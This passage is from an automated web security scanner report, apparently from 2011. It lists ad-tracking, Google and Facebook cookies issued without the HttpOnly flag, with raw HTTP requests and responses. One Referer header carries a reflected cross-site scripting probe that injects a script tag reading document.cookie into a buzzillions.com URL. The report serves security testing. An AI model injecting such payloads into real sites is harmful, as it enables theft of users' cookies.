bkc=KJh566N/PaWDOded4EmMMMmehu00RCJYhyI/YQDgvV5GRxtXwiOvx0GoCHqiNvSi59xHiVhExqLG0aG/agQGIkG1n5GaQHY1Z0eY/vvBsDx48fplfg+pfrR24+hpf7Zzz2bx9QSMyBXUm2yGiLDCXg6qhoDbTw6a/n8VzmA/fc5M6o0FduQm+/TepuLaBynkI4RPbPrVmPdfEQvG3PwGVFcFRtdqYVsmN0fUIff66UC4xMojBGbEX8wu8bSAl2yN4CRMeyepPyIswoux8FgSg0QduFD3kTN7+AopFeqUTd51R8d7IKeX5fg5MuW20Kbjkk8zBObZon7NBnmIdPTIIbakFAIfE/X7ZTeoSflDfpXBf9UncvI2JxU6+0QXnIU/MIFjlf/x87M+ZIuMUxgjilAlixNQMfH/zfptOmNwgWtCiK0Q3jl2kwSgtQrVmP2f++qlvFUey4KpfB8E6M7nZUcMmjgkc+3l4NdlKFNCffn12t+EIpasdkpkX8Rcn51TxGdxFi059eTLfyf5ZJnZ4mNDAFfa5xoFu2tCNt3AmPffswV7RhxR7EOrLXphtLKefp6zrOEDn6S1ENFINVXXWwcMUpg5BcdcXNHsI7b729wnJf132/2QdpX8dFlL/y7o0vg6qv6vlHe13Nnkx346k8dubz63B/n2cBfKWEodUU3oVxZdpAoFqJUr0DA4LJy8Rdy45E7fPQ==; bkdc=res
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /site/353?rand=0.9526619226671755 HTTP/1.1 Host: tags.bluekai.com Proxy-Connection: keep-alive Referer: http://www.tucows.com/videoegg/ad.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: bku=yQG99YBZ/AlFQiDm; bko=KJyE8VBQrsg+f1F/G1gnywedoutxBRZBQKWJA1UsT16nREW00wcOVcK9R+Ijp/WLuSOR3gTVA9D9U19xnx==; bkw4=KJpfoXU9y1M90zU9LsXb9T1wLfZFggw1b65ZDFRyIQQM9y1f9f1C9XmeKTPo2fuHNK2Zy3bKkVWmDctEkRFSakNiNn1hUeBiRBMXGAMpaac3tH7I9+V4YpCxhSbwgwfJuNrLbgAjcW6RsvELmqx2eBcBdfw0T0U4o9Hfs9NupXHyt8uO/zgeittavDQ2DeZe/9wW4e4PD3jjcB7tNF42Kb47a5Zc1RaDVaA01OpXWzC8sAU24bebUlPjK6GZj2Mebc0QKZRsn3ebJ4m2zpx+xnSOlmwRy9YZD8Gjsn8Mz5zrLn8uSySsaE4UzDttHnq73gDpla6x2xUtxxyQAdXYN5F1NacALxvojIOkRJOBRsH/N5KYZCX9BNXSf9XxYeJQ5kokiI8F5cXLR9vjdXumQucZBtzr9J0qGo9=; bkst=KJhMR5Mehx9W+0LX4PAReQcjvQhsaCSJaZRZjg3VvRRsrijJ8AZbuzRoSqGoiHRZhLqs8oSVSKqkBf09biX9Nq1pkmjk8IVU8dAyZymawQYaCOk1eWh1M1yLe/h1EY61nzlBM/6LcMvOowZ8yqSOtqfzunolQTPS1/VZ9/DDsch5XQN0yLJBFnh541NXiLnzL6o10Nv2A6r5w101AX/eEPb9ln1D3aSSy57HB5MPB5pUFXent2y2w3xXnb303BhE+0MR8w2nVb90UCbysXlBeWyLMuy+nR61Mu61e1tBMRdDQt0DTtPQTsa/5lBB23G351bvX1gbX1XJvBTnaB5Qv121i5zNO/SYCRsoiSkhFWZviSs8AjsHoqkHD3vJcMeQEW6+nYlLN8RfIQ/9LG8V89==; bk=UE2gfLUR22QsHNJo; bkc=KJh56AN/PaWDOded7UcDzVSyZWP3EWcGSWJDvJivmD1nStebQYQBLzxwSYaVZhnEWDxALA6afSxQS0aRTvnGSps6SOzWxMOrQCYeiej3Wag7Fw4rrlwr8MNIFwX88lcFvjxe7bXeTSN1PQWGAeIBuFKVseXn9dDExmNbJCrWzFhQEw3IjSfU4CQOuLLPZ+454rheH0c1KKNXCKrqUTtwHbuMKK1ymE6kwEQ+dKsHXSLxrx5RcedkIlHWZr5gFbwbWooUrsDXK6YSX2GXM2IpPPtmaflF4I1cL0cWo2M+12nn0XjePnuys8MFmrcDL82S87fSKU3X39aZq74uKV2ULozLzN8fUypGgkBT7DrH7NKy40RCpc7+KIHppxgJsIkLacF9c3bE8gptJmNw3WaCw87dMdtu23FRu8S8U7rrpwDs7Dz9FyqR7UluvzrJYK1arLLttg5dwp3z4rhMkgZdBC6dHL74ilpPz32krQf4yfxFvhKOnbr+F3+i6k0FcRLYmfLDwrjS4sIPu7BKIp05EI1/1eJolsYjX2GUFwX2Tp77pqXVBn8LIDIlzDdxpqXB+Be2OhhwJbx4B6AdLUyo3Upd2FqdVXe+ppTqAx8ru1IPv5IPl76PiohoAkfqk/fFPqffF4l4KUmW2LwNdaNMKwLf5nMH0qwE5bHUSoUyIbH65qN6K6gbomUWaKwdFfdTqQ==; bkdc=res
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 20:51:17 GMT P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml" Expires: Fri, 04 Feb 2011 20:51:17 GMT Cache-Control: max-age=86400, private Set-Cookie: bk=Rs4UCXUR22QsHNJo; expires=Tue, 02-Aug-2011 20:51:17 GMT; path=/; domain=.bluekai.com Set-Cookie: bkc=KJh56AN/PaWDOded7UcDzVSyZWPZEWcGSWJAvsivmA1nStebQYQBbRBuzYamqEHuHhYH6eRP+JmYg/PQQRrigXUxGk6xY1s6YD/1/+3RxVu5X2bffXb8ZhkIFwX88lnFvPRYcbTOTSN1PQWGA+IwuQIDsEXm9ytExBNsJCrWz7plCFx50N0F4uXYkaz3+sbTd5Qce6mRX23av+5M7T0f/2nHQ7sR7JbVFMGMd4SIX41xrH2RF77z2TZ/B1dU4AlNjEuFmsTX+NISX2GXMdd7S7G5nlF4dXxwjWm/Ef1fjbPUPT6c3VCoJfeRK2uojpI0pwt6YdEp+OSR7KiCId8qpPbhpc7+FEsQgNfCHE8a4knadobW1mKNq8Bw+0GAgbKpDKyYKbCKZFwSDfxdGDSa4VxIcdLjfPKoP0hpF4jYCK+BrGX94khC2N0xEkkmEOGF6P+t6nf2I2qk2smlVIqIt7E2sYPdn4sy8xcn2O0ICtC4NLTOcpX4XP6EAIjbfPQDtBbCXYf487rgUJgptZ4G4oosQJWoT6qn7BzIb8llomKXBpXUBn8GIUK4zUdxpqXv+BcfOhpwJvx4+WQd+cyI3Upd2wqduXe+ppTPAx8rui2DvBdPl7LPu8hoAPfdJHl4Glh42FjdItDp7uKUR0dmsXwqlXaeEDbK7qTkFPS7CBXAoUzlucKZo/2jEky0dQIhCFGy; expires=Tue, 02-Aug-2011 20:51:17 GMT; path=/; domain=.bluekai.com Set-Cookie: bkdc=res; expires=Fri, 04-Feb-2011 20:51:17 GMT; path=/; domain=.bluekai.com BK-Server: a96f Content-Length: 62 Content-Type: image/gif Connection: keep-alive
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /site/365 HTTP/1.1 Host: tags.bluekai.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/lb.buzzillions/;net=lb;u=,lb-5843489_1296770394,11d765b6a10b1b3,none,an.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1;;pos=atf;tile=1;dcopt=ist;sz=728x90;contx=none;dc=w;btg=an.51;btg=an.5;btg=ex.32;btg=ex.76;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.polit_h;btg=cm.sports_h;btg=cm.weath_l;btg=cm.ent_h;btg=bk.rdst1;ord=1296770389? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: bku=yQG99YBZ/AlFQiDm; bkst=KJhMR5Mehx9W+0LX4PAReQcjvQhsaCSJaZRZjg3VvRRsrijJ8AZbuzRoSqGoiHRZhLqs8oSVSKqkBf09biX9Nq1pkmjk8IVU8dAyZymawQYaCOk1eWh1M1yLe/h1EY61nzlBM/6LcMvOowZ8yqSOtqfzunolQTPS1/VZ9/DDsch5XQN0yLJBFnh541NXiLnzL6o10Nv2A6r5w101AX/eEPb9ln1D3aSSy57HB5MPB5pUFXent2y2w3xXnb303BhE+0MR8w2nVb90UCbysXlBeWyLMuy+nR61Mu61e1tBMRdDQt0DTtPQTsa/5lBB23G351bvX1gbX1XJvBTnaB5Qv121i5zNO/SYCRsoiSkhFWZviSs8AjsHoqkHD3vJcMeQEW6+nYlLN8RfIQ/9LG8V89==; bko=KJpMTsPQAJe62ZPAWmPMRnC3fxhA3xnadgI6Oq/ZLEWyw9s0tOiXKuWLHQR8wCMgekeLm818AYDJaWFPNyv09JtgWxy=; bkw4=KJpfoXU9y1M90zU9LsXb9T1wLfZFggw1b65ZDFRyIQQM9y1f9f1C9XmeKTPo2fuHNK2Zy3bKkVWmDctEkRFSakNiNn1hUeBiRBMXGAMpaac3tH7I9+V4YpCxhSbwgwfJuNrLbgAjcW6RsvELmqx2eBcBdfw0T0U4o9Hfs9NupXHyt8uO/zgeiItK1DQ2DeZe/OOnucgf4gN2FqcRgzDKHQ1P9ND/VE9yPYr8a3TyHPRwzGIqSi7En/8LKIFfdglEXTgLyXe3guyjs9fIYmxXMSnIwNe2gf3LwuVE1IhC5e8xwE1eaNe2AF7KmjGV/BKOlmdRy9YZD8Gjsn8MXzzrLn8uSySsaE4UzDttHnq73gDpla6x2xUtxxyQAdXYN5F1NacALxvojIOkRJOBRsH/N5KYZCX9BNXSf9XxYeJQ5kokiI8F5cXLR9vjdXumQucZBtzr9/usgtT=; bk=viY1yZVZbt/sHNJo; bkc=KJh566N/PaWDOded7uX5jySnVExVAh9b4AODvaCJmD1nStnbQYQBbRBuSYWp+uAocDaW/++D6YTvLCSYOubvoko1n+GaQHO1Z0eYx1vBsDx48Xhf2NlwlqpcMdzd2f8fpftk1n9y9ixSer5XYvaW4Z58/s9XPQLWVhDSgtE/MVlL8lA/pN7ZKrlp0Fc4Pp+p9Hxvf9KlMYrDdl9jYv2kzdxJfw58SSfU4AndNp/vBYNkzlbG3rImuBIhpwUS20J93aSCzXAjMfN2aTx8gNtrzlpNAdcIicu6qOyZjXSkn68/FfNFdYJ/fQ5Zghd04Yxip4BgFbqb91NUrVRX+DtSX2GXcfI7WgNPpfg44X4qzAcWh275A2npXXSePeupAUgVKbOSpl8LZz4En+wMtVjQXARwf4K4KFSzjz8gqT6O4z6vnT+oX+1b27/vyopUFA6Il3ZxGF1PhuSyC83kmSX2UKBTk5qMyTXnfJTp6Z7n0PcMsKgaUMGFdffF3bbwF5L0Mb2BtTzXIKLbUf/XRJZt6d1x2UFhawehXhfwijQ6NtFcG7uUBiQLanLXgTVAmS22Qr8EIp9ywsqzSo7pti45dpl3rrMmUd9q7fUX3XITlIdAufTrboIFbGZA211mbDKVEbKD8hUldcfhmKmpM6VAdSFu6pUvzflqgXGbjprAFdtDMZ2H7rsKgXW5fjTpBbDUZ8EyZ8H6xT+65NgbGmUAmKwdAK9Ydx==; bkdc=res
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 21:59:56 GMT P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml" Expires: Fri, 04 Feb 2011 21:59:56 GMT Cache-Control: max-age=86400, private Set-Cookie: bk=gsKMbtVZbt/sHNJo; expires=Tue, 02-Aug-2011 21:59:56 GMT; path=/; domain=.bluekai.com Set-Cookie: bkc=KJh5NW+GWNWDOrOdXZgEJnuuCSAuY2vAehYPa3GVqRvnSAoXQBCVQQI6OHzC6R6VqH1GoRCNGT/fDqYbvauCYXV3i2iam6WGYcWMiaxGT3jVWOd7EmqmfqZqZ47/4Ib8zII58Yl9Vyj0iRWLwuJwk8hwKpW/n/6OLKSOg9zOttXBzN88GCfy+N+GrjyZ+luy7hDQwsIRb8Uwm4ldF+0P2SaRjBId3Ptkdw+nxc92RXIwdSTQp4UvMtkIqKB9b6GZbTPkIXbR2sleUv2XByxWbiN6g2EsRIdReVcmvNzSSgf0D4+9ueoz6xbu6tUoY8wuqI8owdKECTs8ST55cykJzldkPNEFGlfP32gEtbD8gXp2IeT5bfz28dpIm23H2uBSjF5muuXLS/2x6KyZtgwIQlR2I8aCcAI8xoK7VTYoblt6l7XSt4msmSIXnx/1Ju0XvvU/EhgR36A/zNf8aFkT+TDA7SXyBG12ZoeZFwJ1UzNg2eTK4edwfML+7E/zc2KKoqlRHI4klf422Frh2hMZXjPoIP9Q427QiTjpCZA8URdu4iXw9CXIfUD5i6CpFU/AEB2uATVkDGdg2R9688Pw6w4DZS4dCx7+5LmzPpfopwKGT8nEFIMPwZwTN8etLnKVUdE66w88qWdsoH26uEX64Yoor4fC7Bdw7+gTfs1CSKIS2W058qgHtSd3OZKbondIk/8r+PpemPXMmp+5ot2/nf5Sy3IE6LN+6g6obDmsTtKNdymwKyqy; expires=Tue, 02-Aug-2011 21:59:56 GMT; path=/; domain=.bluekai.com Set-Cookie: bkdc=res; expires=Fri, 04-Feb-2011 21:59:56 GMT; path=/; domain=.bluekai.com BK-Server: 1c6d Content-Length: 62 Content-Type: image/gif Connection: keep-alive
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: translate.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 20:32:56 GMT Expires: Thu, 03 Feb 2011 20:32:56 GMT Cache-Control: private, max-age=86400 Content-Type: text/html; charset=UTF-8 Content-Language: en Set-Cookie: PREF=ID=705d98a7bc0e380c:TM=1296765176:LM=1296765176:S=sHB4e3nekqE-YD1z; expires=Sat, 02-Feb-2013 20:32:56 GMT; path=/; domain=.google.com X-Content-Type-Options: nosniff Server: translation X-XSS-Protection: 1; mode=block Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /Tracking/V3/Instream/Impression/?0|1574|42244|30521|5745|14160|HEADER|868|2293|413|BBEEND|&internalRedirect=true&cb=%timestamp%&ss_rand=98204660 HTTP/1.1 Host: trk.vindicosuite.com Proxy-Connection: keep-alive Referer: http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.4.1038 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VINDICOSUITEAUDIENCE=%7B%22PL%22%3A%7B%223BBC8FBC%2DC6A8%2D43A6%2DB65C%2D2405955B79FE%22%3A%7B%2253398251%2DC5D1%2D4466%2D84FA%2D7CEE6AF3F691%22%3A%221295658149%22%7D%7D%7D; VINDICOAUDIENCEISSUEDIDENTITY=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; vpp=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc_vpp={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /pixel/?aid=148&tax=home HTTP/1.1 Host: uat.netmng.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: evo5=kvrgygjr7baud%7C5SyprRh6TrnFV2ndAy2HxCPgLLX3cZ%2FVfx%2FM0biott%2BcqVbJj5aCj55h7IXdjMgE9ed9rfydUW6gLxzZ4Z8iZfTCEnvI5PEwDP8UgnDwsNwf1a3vDJnVlaVWQNH%2F7d2VqxBrm0%2Fc%2FidZYflVD0ff%2F1E5rmifbqDgfH2Gt1zhs%2F2MnA08vEEPGokDm1Bn1W68QLHQ%2FzChSJMJNtyVsrnHyb3E37wmvDfW6FFUnXFOPDqGRb7GXzLEZaSRaSPR19puBUpHlUpXwBEY7g3LfZ4F7q%2FoPuX4s88d6II7AqTrPBQvVC3dTHYL6Y342A5GTpvcniShvZas%2BmBrU%2Fz%2FqdmcKtLQoSpK8%2F1EMObPX4EqA7WzFB9kMN0WKt0l5SlxdqQCviV0iLESOVRgETizb2Os%2Fh1P9v%2FlebIMxnWdfb6%2Byln%2FJfmz2fudQYM%2FGfUhPWgueSqcoFf5wfZykby2hBxGOg%3D%3D
Response
HTTP/1.1 302 Found Date: Thu, 03 Feb 2011 19:03:59 GMT Server: Apache/2.2.9 P3P: policyref="http://uat.netmng.com/w3c/p3p.xml", CP="NOI DSP COR DEVa PSAa OUR BUS COM NAV" Expires: Tue, 01 Feb 2011 19:03:59 GMT Last-Modified: Tue, 01 Feb 2011 19:03:59 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: evo5=kvrgygjr7baud%7CslbpB2OTqHJebVm%2BWLYhLSxmpA%2Bk0H4X%2BmBxXDdVODzOuKT2fiN3y3Y5%2FY%2FsvrMTk5MmDBp7hV7I6KwNAhVYdGvfRM%2Bt5tHVREa3RQX0svzHDl1LVEJkUgauiKULoRLwV%2Bz9EfZ7EbNR6AyPAOiKR2YDLplc5ZP%2FSQ6vGBOIIKPOPjcxxchwc%2Bo4nA5%2BXAHnXvznrsmn%2BcXyzWJFyo%2F7gsKfwS18nNxmub3nTC7jXt6PqmgrUCGB0%2B0vqAMDbEWNWkKk8aNor%2FvzClvR9YGDE1DDjaV8XMfY5k93PKcy7%2BcHAUsxt54LRmbEVOmofd1fIHKn0lsrW9GvKMll8AI8rXfZqe1UwR5PeLBmj4zS2RGDv2trchNe4um3wRa%2BvF6pKy4VT%2BDhUwGQ4LAm8Yog8lNAItduejTtfC9gbzyZMGm7yKAmWVLRZLZBSm7SpNBnA4SM6uA0wtdfTynqTvb5Hw%3D%3D; expires=Fri, 05-Aug-2011 19:03:59 GMT; path=/; domain=.netmng.com Location: http://ad.yieldmanager.com/pixel?id=582755&id=584778&id=584789&t=2 Content-Length: 1 Connection: close Content-Type: text/html; charset=UTF-8
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: video.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Date: Thu, 03 Feb 2011 20:33:04 GMT Expires: Thu, 03 Feb 2011 20:33:04 GMT Cache-Control: private, max-age=0 Set-Cookie: PREF=ID=1be32f5d81ed4b3b:TM=1296765184:LM=1296765184:S=XUl03TgBOSGxaiOV; expires=Sat, 02-Feb-2013 20:33:04 GMT; path=/; domain=.google.com X-Content-Type-Options: nosniff Server: VSFE_1.0 X-XSS-Protection: 1; mode=block Connection: close
<!doctype html> <meta content="text/html; charset=UTF-8" http-equiv=content-type> <meta content="Search millions of videos from across the web." name=description> <title>Google Videos</title> <script> ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b/o?id=cD5Q7abi8r4inHadbi-bnq&i=http%3A%2F%2Fa.collective-media.net%2Fadi%2Flb.buzzillions%2F%3Bpos%3Datf%3Btile%3D1%3Bdcopt%3Dist%3Bsz%3D728x90%3Bord%3D1296770389%3F&ts=1296770455256 HTTP/1.1 Host: w.ic.tynt.com Proxy-Connection: keep-alive Referer: http://www.buzzillions.com/reviews/59ab9%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E4e54375ce26/x22 Cache-Control: max-age=0 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /reviews/kids-abc-development-inc-cntrl-sesame-street-water-teether-reviews/x22 HTTP/1.1 Host: www.buzzillions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.dhgate.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: text/html Content-Language: zh-CN Date: Thu, 03 Feb 2011 21:48:56 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: vid=rBABeU1LIshUmnTRCKTHAg==; expires=Wed, 29-Jan-31 21:48:56 GMT; path=/ Content-Length: 56077
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Conten ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.everycarlisted.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The following cookie was issued by the application and does not have the HttpOnly flag set:
lsd=Al9E9; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=Al9E9; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Thu, 03 Feb 2011 21:49:20 GMT Content-Length: 30803
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
lsd=xRgPt; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /2008/fbml HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 404 Not Found Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=xRgPt; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Thu, 03 Feb 2011 21:49:29 GMT Content-Length: 11422
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
lsd=wLXVp; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /home.php HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 302 Found Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT Location: http://www.facebook.com/login.php P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=wLXVp; path=/; domain=.facebook.com Set-Cookie: next=http%3A%2F%2Fwww.facebook.com%2Fhome.php; path=/; domain=.facebook.com; httponly Set-Cookie: next_path=%2Fhome.php; path=/; domain=.facebook.com; httponly Content-Type: text/html; charset=utf-8 Connection: close Date: Thu, 03 Feb 2011 21:49:25 GMT Content-Length: 0
The following cookie was issued by the application and does not have the HttpOnly flag set:
lsd=FMAWt; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /pages/Veoh/129836657035793 HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 301 Moved Permanently Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT Location: http://www.facebook.com/VeohTV P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=FMAWt; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Thu, 03 Feb 2011 21:49:29 GMT Content-Length: 0
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /share.php HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: datr=y_9KTbq--wiemAhPZf9cZRCm; expires=Sat, 02-Feb-2013 19:19:39 GMT; path=/; domain=.facebook.com; httponly Set-Cookie: lsd=yNjLf; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fshare.php; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fshare.php; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Thu, 03 Feb 2011 19:19:39 GMT Content-Length: 10796
